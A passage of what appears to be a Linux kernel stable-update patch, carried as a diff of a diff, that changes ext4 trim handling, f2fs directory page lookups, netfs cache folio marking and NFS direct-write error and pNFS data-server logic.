++					EXT4_CLUSTER_BITS(sb);
++}
++
++static bool ext4_trim_interrupted(void)
++{
++	return fatal_signal_pending(current) || freezing(current);
++}
++
+ static int ext4_try_to_trim_range(struct super_block *sb,
+ 		struct ext4_buddy *e4b, ext4_grpblk_t start,
+ 		ext4_grpblk_t max, ext4_grpblk_t minblocks)
+@@ -6427,11 +6443,13 @@ __acquires(ext4_group_lock_ptr(sb, e4b->bd_group))
+ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ {
+ 	ext4_grpblk_t next, count, free_count;
++	bool set_trimmed = false;
+ 	void *bitmap;
+ 
+ 	bitmap = e4b->bd_bitmap;
+-	start = (e4b->bd_info->bb_first_free > start) ?
+-		e4b->bd_info->bb_first_free : start;
++	if (start == 0 && max >= ext4_last_grp_cluster(sb, e4b->bd_group))
++		set_trimmed = true;
++	start = max(e4b->bd_info->bb_first_free, start);
+ 	count = 0;
+ 	free_count = 0;
+ 
+@@ -6445,16 +6463,14 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ 			int ret = ext4_trim_extent(sb, start, next - start, e4b);
+ 
+ 			if (ret && ret != -EOPNOTSUPP)
+-				break;
++				return count;
+ 			count += next - start;
+ 		}
+ 		free_count += next - start;
+ 		start = next + 1;
+ 
+-		if (fatal_signal_pending(current)) {
+-			count = -ERESTARTSYS;
+-			break;
+-		}
++		if (ext4_trim_interrupted())
++			return count;
+ 
+ 		if (need_resched()) {
+ 			ext4_unlock_group(sb, e4b->bd_group);
+@@ -6466,6 +6482,9 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ 			break;
+ 	}
+ 
++	if (set_trimmed)
++		EXT4_MB_GRP_SET_TRIMMED(e4b->bd_info);
++
+ 	return count;
+ }
+ 
+@@ -6476,7 +6495,6 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+  * @start:		first group block to examine
+  * @max:		last group block to examine
+  * @minblocks:		minimum extent block count
+- * @set_trimmed:	set the trimmed flag if at least one block is trimmed
+  *
+  * ext4_trim_all_free walks through group's block bitmap searching for free
+  * extents. When the free extent is found, mark it as used in group buddy
+@@ -6486,7 +6504,7 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ static ext4_grpblk_t
+ ext4_trim_all_free(struct super_block *sb, ext4_group_t group,
+ 		   ext4_grpblk_t start, ext4_grpblk_t max,
+-		   ext4_grpblk_t minblocks, bool set_trimmed)
++		   ext4_grpblk_t minblocks)
+ {
+ 	struct ext4_buddy e4b;
+ 	int ret;
+@@ -6503,13 +6521,10 @@ ext4_trim_all_free(struct super_block *sb, ext4_group_t group,
+ 	ext4_lock_group(sb, group);
+ 
+ 	if (!EXT4_MB_GRP_WAS_TRIMMED(e4b.bd_info) ||
+-	    minblocks < EXT4_SB(sb)->s_last_trim_minblks) {
++	    minblocks < EXT4_SB(sb)->s_last_trim_minblks)
+ 		ret = ext4_try_to_trim_range(sb, &e4b, start, max, minblocks);
+-		if (ret >= 0 && set_trimmed)
+-			EXT4_MB_GRP_SET_TRIMMED(e4b.bd_info);
+-	} else {
++	else
+ 		ret = 0;
+-	}
+ 
+ 	ext4_unlock_group(sb, group);
+ 	ext4_mb_unload_buddy(&e4b);
+@@ -6542,7 +6557,6 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
+ 	ext4_fsblk_t first_data_blk =
+ 			le32_to_cpu(EXT4_SB(sb)->s_es->s_first_data_block);
+ 	ext4_fsblk_t max_blks = ext4_blocks_count(EXT4_SB(sb)->s_es);
+-	bool whole_group, eof = false;
+ 	int ret = 0;
+ 
+ 	start = range->start >> sb->s_blocksize_bits;
+@@ -6561,10 +6575,8 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
+ 		if (minlen > EXT4_CLUSTERS_PER_GROUP(sb))
+ 			goto out;
+ 	}
+-	if (end >= max_blks - 1) {
++	if (end >= max_blks - 1)
+ 		end = max_blks - 1;
+-		eof = true;
+-	}
+ 	if (end <= first_data_blk)
+ 		goto out;
+ 	if (start < first_data_blk)
+@@ -6578,9 +6590,10 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
+ 
+ 	/* end now represents the last cluster to discard in this group */
+ 	end = EXT4_CLUSTERS_PER_GROUP(sb) - 1;
+-	whole_group = true;
+ 
+ 	for (group = first_group; group <= last_group; group++) {
++		if (ext4_trim_interrupted())
++			break;
+ 		grp = ext4_get_group_info(sb, group);
+ 		if (!grp)
+ 			continue;
+@@ -6597,13 +6610,11 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
+ 		 * change it for the last group, note that last_cluster is
+ 		 * already computed earlier by ext4_get_group_no_and_offset()
+ 		 */
+-		if (group == last_group) {
++		if (group == last_group)
+ 			end = last_cluster;
+-			whole_group = eof ? true : end == EXT4_CLUSTERS_PER_GROUP(sb) - 1;
+-		}
+ 		if (grp->bb_free >= minlen) {
+ 			cnt = ext4_trim_all_free(sb, group, first_cluster,
+-						 end, minlen, whole_group);
++						 end, minlen);
+ 			if (cnt < 0) {
+ 				ret = cnt;
+ 				break;
+@@ -6648,8 +6659,7 @@ ext4_mballoc_query_range(
+ 
+ 	ext4_lock_group(sb, group);
+ 
+-	start = (e4b.bd_info->bb_first_free > start) ?
+-		e4b.bd_info->bb_first_free : start;
++	start = max(e4b.bd_info->bb_first_free, start);
+ 	if (end >= EXT4_CLUSTERS_PER_GROUP(sb))
+ 		end = EXT4_CLUSTERS_PER_GROUP(sb) - 1;
+ 
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index c230824ab5e6e..a982f91b71eb2 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -1212,7 +1212,8 @@ int f2fs_get_block(struct dnode_of_data *dn, pgoff_t index)
+ }
+ 
+ struct page *f2fs_get_read_data_page(struct inode *inode, pgoff_t index,
+-				     blk_opf_t op_flags, bool for_write)
++				     blk_opf_t op_flags, bool for_write,
++				     pgoff_t *next_pgofs)
+ {
+ 	struct address_space *mapping = inode->i_mapping;
+ 	struct dnode_of_data dn;
+@@ -1238,12 +1239,17 @@ struct page *f2fs_get_read_data_page(struct inode *inode, pgoff_t index,
+ 
+ 	set_new_dnode(&dn, inode, NULL, NULL, 0);
+ 	err = f2fs_get_dnode_of_data(&dn, index, LOOKUP_NODE);
+-	if (err)
++	if (err) {
++		if (err == -ENOENT && next_pgofs)
++			*next_pgofs = f2fs_get_next_page_offset(&dn, index);
+ 		goto put_err;
++	}
+ 	f2fs_put_dnode(&dn);
+ 
+ 	if (unlikely(dn.data_blkaddr == NULL_ADDR)) {
+ 		err = -ENOENT;
++		if (next_pgofs)
++			*next_pgofs = index + 1;
+ 		goto put_err;
+ 	}
+ 	if (dn.data_blkaddr != NEW_ADDR &&
+@@ -1287,7 +1293,8 @@ put_err:
+ 	return ERR_PTR(err);
+ }
+ 
+-struct page *f2fs_find_data_page(struct inode *inode, pgoff_t index)
++struct page *f2fs_find_data_page(struct inode *inode, pgoff_t index,
++					pgoff_t *next_pgofs)
+ {
+ 	struct address_space *mapping = inode->i_mapping;
+ 	struct page *page;
+@@ -1297,7 +1304,7 @@ struct page *f2fs_find_data_page(struct inode *inode, pgoff_t index)
+ 		return page;
+ 	f2fs_put_page(page, 0);
+ 
+-	page = f2fs_get_read_data_page(inode, index, 0, false);
++	page = f2fs_get_read_data_page(inode, index, 0, false, next_pgofs);
+ 	if (IS_ERR(page))
+ 		return page;
+ 
+@@ -1322,18 +1329,14 @@ struct page *f2fs_get_lock_data_page(struct inode *inode, pgoff_t index,
+ {
+ 	struct address_space *mapping = inode->i_mapping;
+ 	struct page *page;
+-repeat:
+-	page = f2fs_get_read_data_page(inode, index, 0, for_write);
++
++	page = f2fs_get_read_data_page(inode, index, 0, for_write, NULL);
+ 	if (IS_ERR(page))
+ 		return page;
+ 
+ 	/* wait for read completion */
+ 	lock_page(page);
+-	if (unlikely(page->mapping != mapping)) {
+-		f2fs_put_page(page, 1);
+-		goto repeat;
+-	}
+-	if (unlikely(!PageUptodate(page))) {
++	if (unlikely(page->mapping != mapping || !PageUptodate(page))) {
+ 		f2fs_put_page(page, 1);
+ 		return ERR_PTR(-EIO);
+ 	}
+diff --git a/fs/f2fs/dir.c b/fs/f2fs/dir.c
+index bf5ba75b75d24..8373eba3a1337 100644
+--- a/fs/f2fs/dir.c
++++ b/fs/f2fs/dir.c
+@@ -340,6 +340,7 @@ static struct f2fs_dir_entry *find_in_level(struct inode *dir,
+ 	unsigned int bidx, end_block;
+ 	struct page *dentry_page;
+ 	struct f2fs_dir_entry *de = NULL;
++	pgoff_t next_pgofs;
+ 	bool room = false;
+ 	int max_slots;
+ 
+@@ -350,12 +351,13 @@ static struct f2fs_dir_entry *find_in_level(struct inode *dir,
+ 			       le32_to_cpu(fname->hash) % nbucket);
+ 	end_block = bidx + nblock;
+ 
+-	for (; bidx < end_block; bidx++) {
++	while (bidx < end_block) {
+ 		/* no need to allocate new dentry pages to all the indices */
+-		dentry_page = f2fs_find_data_page(dir, bidx);
++		dentry_page = f2fs_find_data_page(dir, bidx, &next_pgofs);
+ 		if (IS_ERR(dentry_page)) {
+ 			if (PTR_ERR(dentry_page) == -ENOENT) {
+ 				room = true;
++				bidx = next_pgofs;
+ 				continue;
+ 			} else {
+ 				*res_page = dentry_page;
+@@ -376,6 +378,8 @@ static struct f2fs_dir_entry *find_in_level(struct inode *dir,
+ 		if (max_slots >= s)
+ 			room = true;
+ 		f2fs_put_page(dentry_page, 0);
++
++		bidx++;
+ 	}
+ 
+ 	if (!de && room && F2FS_I(dir)->chash != fname->hash) {
+@@ -963,7 +967,7 @@ void f2fs_delete_entry(struct f2fs_dir_entry *dentry, struct page *page,
+ 
+ bool f2fs_empty_dir(struct inode *dir)
+ {
+-	unsigned long bidx;
++	unsigned long bidx = 0;
+ 	struct page *dentry_page;
+ 	unsigned int bit_pos;
+ 	struct f2fs_dentry_block *dentry_blk;
+@@ -972,13 +976,17 @@ bool f2fs_empty_dir(struct inode *dir)
+ 	if (f2fs_has_inline_dentry(dir))
+ 		return f2fs_empty_inline_dir(dir);
+ 
+-	for (bidx = 0; bidx < nblock; bidx++) {
+-		dentry_page = f2fs_get_lock_data_page(dir, bidx, false);
++	while (bidx < nblock) {
++		pgoff_t next_pgofs;
++
++		dentry_page = f2fs_find_data_page(dir, bidx, &next_pgofs);
+ 		if (IS_ERR(dentry_page)) {
+-			if (PTR_ERR(dentry_page) == -ENOENT)
++			if (PTR_ERR(dentry_page) == -ENOENT) {
++				bidx = next_pgofs;
+ 				continue;
+-			else
++			} else {
+ 				return false;
++			}
+ 		}
+ 
+ 		dentry_blk = page_address(dentry_page);
+@@ -990,10 +998,12 @@ bool f2fs_empty_dir(struct inode *dir)
+ 						NR_DENTRY_IN_BLOCK,
+ 						bit_pos);
+ 
+-		f2fs_put_page(dentry_page, 1);
++		f2fs_put_page(dentry_page, 0);
+ 
+ 		if (bit_pos < NR_DENTRY_IN_BLOCK)
+ 			return false;
++
++		bidx++;
+ 	}
+ 	return true;
+ }
+@@ -1111,7 +1121,8 @@ static int f2fs_readdir(struct file *file, struct dir_context *ctx)
+ 		goto out_free;
+ 	}
+ 
+-	for (; n < npages; n++, ctx->pos = n * NR_DENTRY_IN_BLOCK) {
++	for (; n < npages; ctx->pos = n * NR_DENTRY_IN_BLOCK) {
++		pgoff_t next_pgofs;
+ 
+ 		/* allow readdir() to be interrupted */
+ 		if (fatal_signal_pending(current)) {
+@@ -1125,11 +1136,12 @@ static int f2fs_readdir(struct file *file, struct dir_context *ctx)
+ 			page_cache_sync_readahead(inode->i_mapping, ra, file, n,
+ 				min(npages - n, (pgoff_t)MAX_DIR_RA_PAGES));
+ 
+-		dentry_page = f2fs_find_data_page(inode, n);
++		dentry_page = f2fs_find_data_page(inode, n, &next_pgofs);
+ 		if (IS_ERR(dentry_page)) {
+ 			err = PTR_ERR(dentry_page);
+ 			if (err == -ENOENT) {
+ 				err = 0;
++				n = next_pgofs;
+ 				continue;
+ 			} else {
+ 				goto out_free;
+@@ -1148,6 +1160,8 @@ static int f2fs_readdir(struct file *file, struct dir_context *ctx)
+ 		}
+ 
+ 		f2fs_put_page(dentry_page, 0);
++
++		n++;
+ 	}
+ out_free:
+ 	fscrypt_fname_free_buffer(&fstr);
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 37dca728ff967..f56abb39601ac 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3784,8 +3784,9 @@ int f2fs_reserve_new_block(struct dnode_of_data *dn);
+ int f2fs_get_block(struct dnode_of_data *dn, pgoff_t index);
+ int f2fs_reserve_block(struct dnode_of_data *dn, pgoff_t index);
+ struct page *f2fs_get_read_data_page(struct inode *inode, pgoff_t index,
+-			blk_opf_t op_flags, bool for_write);
+-struct page *f2fs_find_data_page(struct inode *inode, pgoff_t index);
++			blk_opf_t op_flags, bool for_write, pgoff_t *next_pgofs);
++struct page *f2fs_find_data_page(struct inode *inode, pgoff_t index,
++							pgoff_t *next_pgofs);
+ struct page *f2fs_get_lock_data_page(struct inode *inode, pgoff_t index,
+ 			bool for_write);
+ struct page *f2fs_get_new_data_page(struct inode *inode,
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index aa4d513daa8f8..ec7212f7a9b73 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1600,8 +1600,8 @@ next_step:
+ 				continue;
+ 			}
+ 
+-			data_page = f2fs_get_read_data_page(inode,
+-						start_bidx, REQ_RAHEAD, true);
++			data_page = f2fs_get_read_data_page(inode, start_bidx,
++							REQ_RAHEAD, true, NULL);
+ 			f2fs_up_write(&F2FS_I(inode)->i_gc_rwsem[WRITE]);
+ 			if (IS_ERR(data_page)) {
+ 				iput(inode);
+diff --git a/fs/netfs/buffered_read.c b/fs/netfs/buffered_read.c
+index 7679a68e81930..caa0a053e8a9d 100644
+--- a/fs/netfs/buffered_read.c
++++ b/fs/netfs/buffered_read.c
+@@ -47,12 +47,14 @@ void netfs_rreq_unlock_folios(struct netfs_io_request *rreq)
+ 	xas_for_each(&xas, folio, last_page) {
+ 		loff_t pg_end;
+ 		bool pg_failed = false;
++		bool folio_started;
+ 
+ 		if (xas_retry(&xas, folio))
+ 			continue;
+ 
+ 		pg_end = folio_pos(folio) + folio_size(folio) - 1;
+ 
++		folio_started = false;
+ 		for (;;) {
+ 			loff_t sreq_end;
+ 
+@@ -60,8 +62,10 @@ void netfs_rreq_unlock_folios(struct netfs_io_request *rreq)
+ 				pg_failed = true;
+ 				break;
+ 			}
+-			if (test_bit(NETFS_SREQ_COPY_TO_CACHE, &subreq->flags))
++			if (!folio_started && test_bit(NETFS_SREQ_COPY_TO_CACHE, &subreq->flags)) {
+ 				folio_start_fscache(folio);
++				folio_started = true;
++			}
+ 			pg_failed |= subreq_failed;
+ 			sreq_end = subreq->start + subreq->len - 1;
+ 			if (pg_end < sreq_end)
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index 3bb530d4bb5ce..5a976fa343df1 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -93,12 +93,10 @@ nfs_direct_handle_truncated(struct nfs_direct_req *dreq,
+ 		dreq->max_count = dreq_len;
+ 		if (dreq->count > dreq_len)
+ 			dreq->count = dreq_len;
+-
+-		if (test_bit(NFS_IOHDR_ERROR, &hdr->flags))
+-			dreq->error = hdr->error;
+-		else /* Clear outstanding error if this is EOF */
+-			dreq->error = 0;
+ 	}
++
++	if (test_bit(NFS_IOHDR_ERROR, &hdr->flags) && !dreq->error)
++		dreq->error = hdr->error;
+ }
+ 
+ static void
+@@ -120,6 +118,18 @@ nfs_direct_count_bytes(struct nfs_direct_req *dreq,
+ 		dreq->count = dreq_len;
+ }
+ 
++static void nfs_direct_truncate_request(struct nfs_direct_req *dreq,
++					struct nfs_page *req)
++{
++	loff_t offs = req_offset(req);
++	size_t req_start = (size_t)(offs - dreq->io_start);
++
++	if (req_start < dreq->max_count)
++		dreq->max_count = req_start;
++	if (req_start < dreq->count)
++		dreq->count = req_start;
++}
++
+ /**
+  * nfs_swap_rw - NFS address space operation for swap I/O
+  * @iocb: target I/O control block
+@@ -490,7 +500,9 @@ static void nfs_direct_add_page_head(struct list_head *list,
+ 	kref_get(&head->wb_kref);
+ }
+ 
+-static void nfs_direct_join_group(struct list_head *list, struct inode *inode)
++static void nfs_direct_join_group(struct list_head *list,
++				  struct nfs_commit_info *cinfo,
++				  struct inode *inode)
+ {
+ 	struct nfs_page *req, *subreq;
+ 
+@@ -512,7 +524,7 @@ static void nfs_direct_join_group(struct list_head *list, struct inode *inode)
+ 				nfs_release_request(subreq);
+ 			}
+ 		} while ((subreq = subreq->wb_this_page) != req);
+-		nfs_join_page_group(req, inode);
++		nfs_join_page_group(req, cinfo, inode);
+ 	}
+ }
+ 
+@@ -530,20 +542,15 @@ nfs_direct_write_scan_commit_list(struct inode *inode,
+ static void nfs_direct_write_reschedule(struct nfs_direct_req *dreq)
+ {
+ 	struct nfs_pageio_descriptor desc;
+-	struct nfs_page *req, *tmp;
++	struct nfs_page *req;
+ 	LIST_HEAD(reqs);
+ 	struct nfs_commit_info cinfo;
+-	LIST_HEAD(failed);
+ 
+ 	nfs_init_cinfo_from_dreq(&cinfo, dreq);
+ 	nfs_direct_write_scan_commit_list(dreq->inode, &reqs, &cinfo);
+ 
+-	nfs_direct_join_group(&reqs, dreq->inode);
++	nfs_direct_join_group(&reqs, &cinfo, dreq->inode);
+ 
+-	dreq->count = 0;
+-	dreq->max_count = 0;
+-	list_for_each_entry(req, &reqs, wb_list)
+-		dreq->max_count += req->wb_bytes;
+ 	nfs_clear_pnfs_ds_commit_verifiers(&dreq->ds_cinfo);
+ 	get_dreq(dreq);
+ 
+@@ -551,27 +558,40 @@ static void nfs_direct_write_reschedule(struct nfs_direct_req *dreq)
+ 			      &nfs_direct_write_completion_ops);
+ 	desc.pg_dreq = dreq;
+ 
+-	list_for_each_entry_safe(req, tmp, &reqs, wb_list) {
++	while (!list_empty(&reqs)) {
++		req = nfs_list_entry(reqs.next);
+ 		/* Bump the transmission count */
+ 		req->wb_nio++;
+ 		if (!nfs_pageio_add_request(&desc, req)) {
+-			nfs_list_move_request(req, &failed);
+-			spin_lock(&cinfo.inode->i_lock);
+-			dreq->flags = 0;
+-			if (desc.pg_error < 0)
++			spin_lock(&dreq->lock);
++			if (dreq->error < 0) {
++				desc.pg_error = dreq->error;
++			} else if (desc.pg_error != -EAGAIN) {
++				dreq->flags = 0;
++				if (!desc.pg_error)
++					desc.pg_error = -EIO;
+ 				dreq->error = desc.pg_error;
+-			else
+-				dreq->error = -EIO;
+-			spin_unlock(&cinfo.inode->i_lock);
++			} else
++				dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
++			spin_unlock(&dreq->lock);
++			break;
+ 		}
+ 		nfs_release_request(req);
+ 	}
+ 	nfs_pageio_complete(&desc);
+ 
+-	while (!list_empty(&failed)) {
+-		req = nfs_list_entry(failed.next);
++	while (!list_empty(&reqs)) {
++		req = nfs_list_entry(reqs.next);
+ 		nfs_list_remove_request(req);
+ 		nfs_unlock_and_release_request(req);
++		if (desc.pg_error == -EAGAIN) {
++			nfs_mark_request_commit(req, NULL, &cinfo, 0);
++		} else {
++			spin_lock(&dreq->lock);
++			nfs_direct_truncate_request(dreq, req);
++			spin_unlock(&dreq->lock);
++			nfs_release_request(req);
++		}
+ 	}
+ 
+ 	if (put_dreq(dreq))
+@@ -591,8 +611,6 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 	if (status < 0) {
+ 		/* Errors in commit are fatal */
+ 		dreq->error = status;
+-		dreq->max_count = 0;
+-		dreq->count = 0;
+ 		dreq->flags = NFS_ODIRECT_DONE;
+ 	} else {
+ 		status = dreq->error;
+@@ -603,7 +621,12 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 	while (!list_empty(&data->pages)) {
+ 		req = nfs_list_entry(data->pages.next);
+ 		nfs_list_remove_request(req);
+-		if (status >= 0 && !nfs_write_match_verf(verf, req)) {
++		if (status < 0) {
++			spin_lock(&dreq->lock);
++			nfs_direct_truncate_request(dreq, req);
++			spin_unlock(&dreq->lock);
++			nfs_release_request(req);
++		} else if (!nfs_write_match_verf(verf, req)) {
+ 			dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+ 			/*
+ 			 * Despite the reboot, the write was successful,
+@@ -611,7 +634,7 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 			 */
+ 			req->wb_nio = 0;
+ 			nfs_mark_request_commit(req, NULL, &cinfo, 0);
+-		} else /* Error or match */
++		} else
+ 			nfs_release_request(req);
+ 		nfs_unlock_and_release_request(req);
+ 	}
+@@ -664,6 +687,7 @@ static void nfs_direct_write_clear_reqs(struct nfs_direct_req *dreq)
+ 	while (!list_empty(&reqs)) {
+ 		req = nfs_list_entry(reqs.next);
+ 		nfs_list_remove_request(req);
++		nfs_direct_truncate_request(dreq, req);
+ 		nfs_release_request(req);
+ 		nfs_unlock_and_release_request(req);
+ 	}
+@@ -713,7 +737,8 @@ static void nfs_direct_write_completion(struct nfs_pgio_header *hdr)
+ 	}
+ 
+ 	nfs_direct_count_bytes(dreq, hdr);
+-	if (test_bit(NFS_IOHDR_UNSTABLE_WRITES, &hdr->flags)) {
++	if (test_bit(NFS_IOHDR_UNSTABLE_WRITES, &hdr->flags) &&
++	    !test_bit(NFS_IOHDR_ERROR, &hdr->flags)) {
+ 		if (!dreq->flags)
+ 			dreq->flags = NFS_ODIRECT_DO_COMMIT;
+ 		flags = dreq->flags;
+@@ -757,18 +782,23 @@ static void nfs_write_sync_pgio_error(struct list_head *head, int error)
+ static void nfs_direct_write_reschedule_io(struct nfs_pgio_header *hdr)
+ {
+ 	struct nfs_direct_req *dreq = hdr->dreq;
++	struct nfs_page *req;
++	struct nfs_commit_info cinfo;
+ 
+ 	trace_nfs_direct_write_reschedule_io(dreq);
+ 
++	nfs_init_cinfo_from_dreq(&cinfo, dreq);
+ 	spin_lock(&dreq->lock);
+-	if (dreq->error == 0) {
++	if (dreq->error == 0)
+ 		dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+-		/* fake unstable write to let common nfs resend pages */
+-		hdr->verf.committed = NFS_UNSTABLE;
+-		hdr->good_bytes = hdr->args.offset + hdr->args.count -
+-			hdr->io_start;
+-	}
++	set_bit(NFS_IOHDR_REDO, &hdr->flags);
+ 	spin_unlock(&dreq->lock);
++	while (!list_empty(&hdr->pages)) {
++		req = nfs_list_entry(hdr->pages.next);
++		nfs_list_remove_request(req);
++		nfs_unlock_request(req);
++		nfs_mark_request_commit(req, NULL, &cinfo, 0);
++	}
+ }
+ 
+ static const struct nfs_pgio_completion_ops nfs_direct_write_completion_ops = {
+@@ -796,9 +826,11 @@ static ssize_t nfs_direct_write_schedule_iovec(struct nfs_direct_req *dreq,
+ {
+ 	struct nfs_pageio_descriptor desc;
+ 	struct inode *inode = dreq->inode;
++	struct nfs_commit_info cinfo;
+ 	ssize_t result = 0;
+ 	size_t requested_bytes = 0;
+ 	size_t wsize = max_t(size_t, NFS_SERVER(inode)->wsize, PAGE_SIZE);
++	bool defer = false;
+ 
+ 	trace_nfs_direct_write_schedule_iovec(dreq);
+ 
+@@ -839,19 +871,39 @@ static ssize_t nfs_direct_write_schedule_iovec(struct nfs_direct_req *dreq,
+ 				break;
+ 			}
+ 
++			pgbase = 0;
++			bytes -= req_len;
++			requested_bytes += req_len;
++			pos += req_len;
++			dreq->bytes_left -= req_len;
++
++			if (defer) {
++				nfs_mark_request_commit(req, NULL, &cinfo, 0);
++				continue;
++			}
++
+ 			nfs_lock_request(req);
+ 			req->wb_index = pos >> PAGE_SHIFT;
+ 			req->wb_offset = pos & ~PAGE_MASK;
+-			if (!nfs_pageio_add_request(&desc, req)) {
++			if (nfs_pageio_add_request(&desc, req))
++				continue;
++
++			/* Exit on hard errors */
++			if (desc.pg_error < 0 && desc.pg_error != -EAGAIN) {
+ 				result = desc.pg_error;
+ 				nfs_unlock_and_release_request(req);
+ 				break;
+ 			}
+-			pgbase = 0;
+-			bytes -= req_len;
+-			requested_bytes += req_len;
+-			pos += req_len;
+-			dreq->bytes_left -= req_len;
++
++			/* If the error is soft, defer remaining requests */
++			nfs_init_cinfo_from_dreq(&cinfo, dreq);
++			spin_lock(&dreq->lock);
++			dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
++			spin_unlock(&dreq->lock);
++			nfs_unlock_request(req);
++			nfs_mark_request_commit(req, NULL, &cinfo, 0);
++			desc.pg_error = 0;
++			defer = true;
+ 		}
+ 		nfs_direct_release_pages(pagevec, npages);
+ 		kvfree(pagevec);
+diff --git a/fs/nfs/flexfilelayout/flexfilelayout.c b/fs/nfs/flexfilelayout/flexfilelayout.c
+index 1ec79ccf89ad2..5c69a6e9ab3e1 100644
+--- a/fs/nfs/flexfilelayout/flexfilelayout.c
++++ b/fs/nfs/flexfilelayout/flexfilelayout.c
+@@ -1235,6 +1235,7 @@ static void ff_layout_io_track_ds_error(struct pnfs_layout_segment *lseg,
+ 		case -EPFNOSUPPORT:
+ 		case -EPROTONOSUPPORT:
+ 		case -EOPNOTSUPP:
++		case -EINVAL:
+ 		case -ECONNREFUSED:
+ 		case -ECONNRESET:
+ 		case -EHOSTDOWN:
+diff --git a/fs/nfs/nfs4client.c b/fs/nfs/nfs4client.c
+index d3051b051a564..84b345efcec00 100644
+--- a/fs/nfs/nfs4client.c
++++ b/fs/nfs/nfs4client.c
+@@ -231,6 +231,8 @@ struct nfs_client *nfs4_alloc_client(const struct nfs_client_initdata *cl_init)
+ 	__set_bit(NFS_CS_DISCRTRY, &clp->cl_flags);
+ 	__set_bit(NFS_CS_NO_RETRANS_TIMEOUT, &clp->cl_flags);
+ 
++	if (test_bit(NFS_CS_DS, &cl_init->init_flags))
++		__set_bit(NFS_CS_DS, &clp->cl_flags);
+ 	/*
+ 	 * Set up the connection to the server before we add add to the
+ 	 * global list.
+@@ -414,6 +416,8 @@ static void nfs4_add_trunk(struct nfs_client *clp, struct nfs_client *old)
+ 		.net = old->cl_net,
+ 		.servername = old->cl_hostname,
+ 	};
++	int max_connect = test_bit(NFS_CS_PNFS, &clp->cl_flags) ?
++		clp->cl_max_connect : old->cl_max_connect;
+ 
+ 	if (clp->cl_proto != old->cl_proto)
+ 		return;
+@@ -427,7 +431,7 @@ static void nfs4_add_trunk(struct nfs_client *clp, struct nfs_client *old)
+ 	xprt_args.addrlen = clp_salen;
+ 
+ 	rpc_clnt_add_xprt(old->cl_rpcclient, &xprt_args,
+-			  rpc_clnt_test_and_add_xprt, NULL);
++			  rpc_clnt_test_and_add_xprt, &max_connect);
+ }
+ 
+ /**
+@@ -993,6 +997,9 @@ struct nfs_client *nfs4_set_ds_client(struct nfs_server *mds_srv,
+ 	if (mds_srv->flags & NFS_MOUNT_NORESVPORT)
+ 		__set_bit(NFS_CS_NORESVPORT, &cl_init.init_flags);
+ 
++	__set_bit(NFS_CS_DS, &cl_init.init_flags);
++	__set_bit(NFS_CS_PNFS, &cl_init.init_flags);
++	cl_init.max_connect = NFS_MAX_TRANSPORTS;
+ 	/*
+ 	 * Set an authflavor equual to the MDS value. Use the MDS nfs_client
+ 	 * cl_ipaddr so as to use the same EXCHANGE_ID co_ownerid as the MDS
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 2dec0fed1ba16..be570c65ae154 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -2708,8 +2708,12 @@ static int _nfs4_proc_open(struct nfs4_opendata *data,
+ 			return status;
+ 	}
+ 	if (!(o_res->f_attr->valid & NFS_ATTR_FATTR)) {
++		struct nfs_fh *fh = &o_res->fh;
++
+ 		nfs4_sequence_free_slot(&o_res->seq_res);
+-		nfs4_proc_getattr(server, &o_res->fh, o_res->f_attr, NULL);
++		if (o_arg->claim == NFS4_OPEN_CLAIM_FH)
++			fh = NFS_FH(d_inode(data->dentry));
++		nfs4_proc_getattr(server, fh, o_res->f_attr, NULL);
+ 	}
+ 	return 0;
+ }
+@@ -8794,6 +8798,8 @@ nfs4_run_exchange_id(struct nfs_client *clp, const struct cred *cred,
+ #ifdef CONFIG_NFS_V4_1_MIGRATION
+ 	calldata->args.flags |= EXCHGID4_FLAG_SUPP_MOVED_MIGR;
+ #endif
++	if (test_bit(NFS_CS_DS, &clp->cl_flags))
++		calldata->args.flags |= EXCHGID4_FLAG_USE_PNFS_DS;
+ 	msg.rpc_argp = &calldata->args;
+ 	msg.rpc_resp = &calldata->res;
+ 	task_setup_data.callback_data = calldata;
+@@ -8871,6 +8877,8 @@ static int _nfs4_proc_exchange_id(struct nfs_client *clp, const struct cred *cre
+ 	/* Save the EXCHANGE_ID verifier session trunk tests */
+ 	memcpy(clp->cl_confirm.data, argp->verifier.data,
+ 	       sizeof(clp->cl_confirm.data));
++	if (resp->flags & EXCHGID4_FLAG_USE_PNFS_DS)
++		set_bit(NFS_CS_DS, &clp->cl_flags);
+ out:
+ 	trace_nfs4_exchange_id(clp, status);
+ 	rpc_put_task(task);
+diff --git a/fs/nfs/write.c b/fs/nfs/write.c
+index f41d24b54fd1f..0a8aed0ac9945 100644
+--- a/fs/nfs/write.c
++++ b/fs/nfs/write.c
+@@ -58,7 +58,8 @@ static const struct nfs_pgio_completion_ops nfs_async_write_completion_ops;
+ static const struct nfs_commit_completion_ops nfs_commit_completion_ops;
+ static const struct nfs_rw_ops nfs_rw_write_ops;
+ static void nfs_inode_remove_request(struct nfs_page *req);
